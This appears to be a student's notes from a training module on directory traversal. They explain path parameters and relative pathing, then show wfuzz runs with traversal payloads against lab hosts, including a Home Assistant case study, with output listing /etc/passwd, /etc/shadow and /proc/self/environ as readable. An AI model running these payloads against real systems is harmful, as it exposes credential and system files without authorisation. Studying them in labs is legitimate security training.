Module 10: Directory Traversal Attacks
Directory Traversal Overview
Accessing The Lab Machines
Start the VPN, the VM, and add the ip to your hosts file.
Understanding Suggestive Parameters
A paremeter that hints at what it does or the types of data values it works with, typically vai its name.
Sample search request
GET /search/Hello%20World! HTTP/1.1Sample file retrieval request
GET /admin/dashboard/manage/handler.aspx?file=ourFile.jpeg HTTP/1.1Sample Suggestive Parameters
?file=
?f=
/file/someFile
?location=
?l=
/location/someLocation
search=
s=
/search/someSearch
?data=
?d=
/data/someData
?download=
?d=
/download/someFileDataRelative vs. Absolute Pathing
Absolute Pathing
The full path, i.e. /home/kali/Desktop
Example command utilizing absolute pathing
kali@kali:~$ cd /etc/
kali@kali:/etc$ pwd
/etc
kali@kali:/etc$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:kali,root
fax:x:21:
voice:x:22:
cdrom:x:24:kali
floppy:x:25:kali
tape:x:26:
sudo:x:27:kali
audio:x:29:pulse,kali
dip:x:30:kali
www-data:x:33:
backup:x:34:
... Extra Mile I
Try it in your own VM.
Relative Pathing
The path to a target file/folder relative to your current working directory.
Group File Read from a relative perspective in /etc/
kali@kali:/etc$ pwd
/etc
kali@kali:/etc$ cat group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:kali,root
fax:x:21:
voice:x:22:
cdrom:x:24:kali
floppy:x:25:kali
tape:x:26:
sudo:x:27:kali
audio:x:29:pulse,kali
dip:x:30:kali
www-data:x:33:
backup:x:34:Group File Read with traversal strings
kali@kali: $ pwd
/home/kali
kali@kali:/etc$ cat ../../etc/group
root:x:0:
daemon:x:1:
...Extra Mile II
Do it on your own VM.
Directory Listing
Parameter Analysis
The value being /var/www/html/demo/css indicates we're likely dealing with absolute pathing. This also tells us the target is likely running Linux with a web-root of /var/www/html.
Evidence of Directory Listing
Test by replacin the path with ..%2F
Directory Traversal Sandbox
Directory Traversal - Exploitation
Wordlist/Payload Lists
Automated attempts are only as good as the wordlist used — we'll be using seclists/Fuzzing/LFI/LFI-Jhaddix.txt.
Fuzzing the Path Parameter
Erroneous Output to be Filtered
kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt http://dirTravSandbox:80/relativePathing.php?path=../../../../../../../../../../FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://dirTravSandbox:80/relativePathing.php?path=../../../../../../../../../../FUZZ
Total requests: 914
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000007: 200 3 L 10 W 81 Ch "%0a/bin/cat%20/etc/passwd"
000000004: 200 3 L 10 W 81 Ch "%00/etc/passwd%00"
000000014: 200 3 L 10 W 81 Ch "/../../../../../../../../%2A"
000000005: 200 3 L 10 W 81 Ch "%00../../../../../../etc/shadow"
000000002: 200 3 L 10 W 81 Ch "\...\\\...\\\...\\\"
000000026: 200 3 L 19 W 125 Ch "/admin/install.php"
000000020: 200 3 L 10 W 81 Ch "..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed"
000000022: 200 3 L 10 W 81 Ch "..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow"
000000023: 200 3 L 10 W 81 Ch "=3D ./... . .%2f.."
000000029: 200 3 L 10 W 81 Ch "/apache2/logs/access.log"
000000021: 200 22 L 34 W 1007 Ch "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd"
000000027: 200 3 L 10 W 81 Ch "../../../administrator/inbox"
000000033: 200 3 L 10 W 81 Ch "/apache/logs/access.log"
000000035: 200 3 L 10 W 81 Ch "../../../../apache/logs/access.log"
000000036: 200 3 L 10 W 81 Ch "../../../apache/logs/access.log"
000000037: 200 3 L 10 W 81 Ch "../../apache/logs/access.log"
000000038: 200 3 L 10 W 81 Ch "../apache/logs/access.log"
000000034: 200 3 L 10 W 81 Ch "../../../../../apache/logs/access.log"
000000031: 200 3 L 10 W 81 Ch "/apache2/logs/error.log"
000000028: 200 3 L 10 W 81 Ch "/apache2/logs/access_log"
000000030: 200 3 L 10 W 81 Ch "/apache2/logs/error_log"
000000032: 200 3 L 10 W 81 Ch "/apache/logs/access_log"
000000039: 200 3 L 10 W 81 Ch "/apache/logs/error_log"
000000041: 200 3 L 10 W 81 Ch "../../../../../apache/logs/error.log"
000000045: 200 3 L 10 W 81 Ch "../apache/logs/error.log"
000000052: 200 3 L 10 W 81 Ch "/../../../../../../../../bin/id|"
000000051: 200 3 L 10 W 81 Ch "/.bashrc"
000000050: 200 3 L 10 W 81 Ch "/.bash_profile"
000000049: 200 3 L 10 W 81 Ch "/.bash_history"
...Enumerating out the target Operating System
kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hc 404 --hh 81,125 http://dirTravSandbox/relativePathing.php?path=../../../../../../../../../../../../FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://dirTravSandbox/relativePathing.php?path=../../../../../../../../../../../../FUZZ
Total requests: 914
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000021: 200 22 L 34 W 1007 Ch "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd"
000000114: 200 230 L 1125 W 7305 Ch "/etc/apache2/apache2.conf"
000000131: 200 42 L 49 W 527 Ch "/etc/group"
000000128: 200 4 L 16 W 118 Ch "/etc/fstab"
000000122: 200 9 L 37 W 502 Ch "/etc/apt/sources.list"
000000198: 200 10 L 26 W 255 Ch "/etc/hosts"
000000199: 200 10 L 26 W 255 Ch "../../../../../../../../../../../../etc/hosts"
000000230: 200 5 L 15 W 108 Ch "/etc/issue"
000000229: 200 358 L 1060 W 8262 Ch "/etc/init.d/apache2"
000000239: 200 10 L 51 W 367 Ch "/etc/motd"
. . .
. . .
000000243: 200 23 L 71 W 575 Ch "/etc/nsswitch.conf"
000000269: 200 22 L 34 W 1007 Ch "../../../../etc/passwd"
000000267: 200 22 L 34 W 1007 Ch "../../../../../../etc/passwd"
000000272: 200 22 L 34 W 1007 Ch "../etc/passwd"
000000276: 200 22 L 34 W 1007 Ch "etc/passwd"
000000271: 200 22 L 34 W 1007 Ch "../../etc/passwd"
000000270: 200 22 L 34 W 1007 Ch "../../../etc/passwd"
000000268: 200 22 L 34 W 1007 Ch "../../../../../etc/passwd"
000000304: 200 22 L 34 W 1007 Ch "../../../../../../etc/passwd&=%3C%3C%3C%3C"
000000392: 200 5 L 14 W 119 Ch "/etc/resolv.conf"
000000495: 200 5 L 25 W 237 Ch "/proc/net/arp"
000000494: 200 29 L 166 W 3272 Ch "/proc/mounts"
000000496: 200 9 L 98 W 774 Ch "/proc/net/dev"
000000492: 200 4 L 15 W 105 Ch "/proc/loadavg"
000000493: 200 53 L 156 W 1472 Ch "/proc/meminfo"
000000490: 200 159 L 1018 W 5667 Ch "/proc/cpuinfo"
000000491: 200 34 L 298 W 3097 Ch "/proc/interrupts"
000000497: 200 6 L 43 W 465 Ch "/proc/net/route"
000000499: 200 23 L 86 W 654 Ch "/proc/partitions"
000000503: 200 4 L 31 W 225 Ch "/proc/version"
000000502: 200 59 L 145 W 1116 Ch "/proc/self/status"
000000500: 200 3 L 10 W 102 Ch "/proc/self/cmdline"
000000498: 200 16 L 227 W 2031 Ch "/proc/net/tcp"
000000692: 200 3 L 10 W 29573 Ch "/var/log/lastlog"Case Study: Home Assistant
Initial Application Assessment
Fuzzing the Web-Root and Analyzing the 404 Response size
kali@kali:~$ wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt http://homeassistant:8123/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://homeassistant:8123/FUZZ
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000003: 404 0 L 3 W 14 Ch ".bashrc"
000000009: 404 0 L 3 W 14 Ch ".git/HEAD"Fuzzing the /fontawesome/ URI and analyzin the 404 response size
kali@kali:~$ wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt http://homeassistant:8123/fontawesome/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://homeassistant:8123/fontawesome/FUZZ
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000010: 404 0 L 0 W 0 Ch ".history"
000000009: 404 0 L 0 W 0 Ch ".git/HEAD"Exploitation
Fuzzing the /fontawesome/ URI
kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hc 404 http://homeassistant:8123/fontawesome/../../../../../../../../../../../../FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://homeassistant:8123/fontawesome/../../../../../../../../../../../../FUZZ
Total requests: 914
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000128: 200 2 L 12 W 89 Ch "/etc/fstab"
000000131: 200 49 L 49 W 725 Ch "/etc/group"
000000198: 200 7 L 16 W 174 Ch "/etc/hosts"
000000199: 200 7 L 16 W 174 Ch "../../../../../../../../../../../../etc/hosts"
000000230: 200 3 L 11 W 54 Ch "/etc/issue"
000000242: 200 19 L 103 W 767 Ch "/etc/netconfig"
000000239: 200 10 L 39 W 283 Ch "/etc/motd"
000000247: 200 28 L 30 W 1228 Ch "/../../../../../../../../../../etc/passwd"
000000259: 200 28 L 30 W 1228 Ch "../../../../../../../../../../../../../../etc/passwd"
000000271: 200 28 L 30 W 1228 Ch "../../etc/passwd"
000000272: 200 28 L 30 W 1228 Ch "../etc/passwd"
000000270: 200 28 L 30 W 1228 Ch "../../../etc/passwd"
000000268: 200 28 L 30 W 1228 Ch "../../../../../etc/passwd"
000000269: 200 28 L 30 W 1228 Ch "../../../../etc/passwd"
000000267: 200 28 L 30 W 1228 Ch "../../../../../../etc/passwd"
000000266: 200 28 L 30 W 1228 Ch "../../../../../../../etc/passwd"
000000265: 200 28 L 30 W 1228 Ch "../../../../../../../../etc/passwd"
000000246: 200 28 L 30 W 1228 Ch "/./././././././././././etc/passwd"
000000276: 200 28 L 30 W 1228 Ch "etc/passwd"
000000401: 200 28 L 28 W 454 Ch "/./././././././././././etc/shadow"
000000402: 200 28 L 28 W 454 Ch "/../../../../../../../../../../etc/shadow"
000000392: 200 2 L 4 W 38 Ch "/etc/resolv.conf"
000000405: 200 28 L 28 W 454 Ch "/etc/shadow"
000000406: 200 28 L 28 W 454 Ch "../../../../../../../../../../../../etc/shadow"
000000491: 200 31 L 287 W 3016 Ch "/proc/interrupts"
000000493: 200 50 L 146 W 1391 Ch "/proc/meminfo"
000000495: 200 2 L 15 W 156 Ch "/proc/net/arp"
000000499: 200 20 L 76 W 573 Ch "/proc/partitions"
000000490: 200 156 L 1008 W 5586 Ch "/proc/cpuinfo"
000000492: 200 1 L 5 W 25 Ch "/proc/loadavg"
000000503: 200 1 L 21 W 144 Ch "/proc/version"
000000497: 200 3 L 33 W 384 Ch "/proc/net/route"
000000501: 200 0 L 1 W 557 Ch "/proc/self/environ"
000000498: 200 15 L 240 W 2250 Ch "/proc/net/tcp"
000000502: 200 56 L 145 W 1063 Ch "/proc/self/status"
000000500: 200 0 L 1 W 42 Ch "/proc/self/cmdline"
000000494: 200 37 L 222 W 3760 Ch "/proc/mounts"
000000496: 200 6 L 88 W 693 Ch "/proc/net/dev"Extra Mile
Do the lab yourself.
Wrapping Up
We did the thing.
Last updated